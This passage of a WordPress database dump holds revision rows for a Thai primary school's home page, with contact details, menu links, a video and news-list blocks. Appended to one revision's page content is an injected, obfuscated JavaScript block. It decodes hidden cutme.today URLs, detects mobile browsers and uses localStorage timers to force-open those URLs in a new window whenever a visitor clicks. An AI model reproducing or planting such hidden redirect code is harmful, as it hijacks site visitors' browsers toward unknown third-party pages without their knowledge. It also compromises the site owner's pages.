gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-26 16:25:24','2024-08-26 09:25:24','',19,'http://watprato.ssk.in.th/?p=218',0,'revision','',0),
(219,2,'2024-08-26 16:26:28','2024-08-26 09:26:28','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1X6Ept6IxYaNET5DErIMExwq1jHu3vOIS/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">แบบวัดการรับรู้ EIT 2</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} 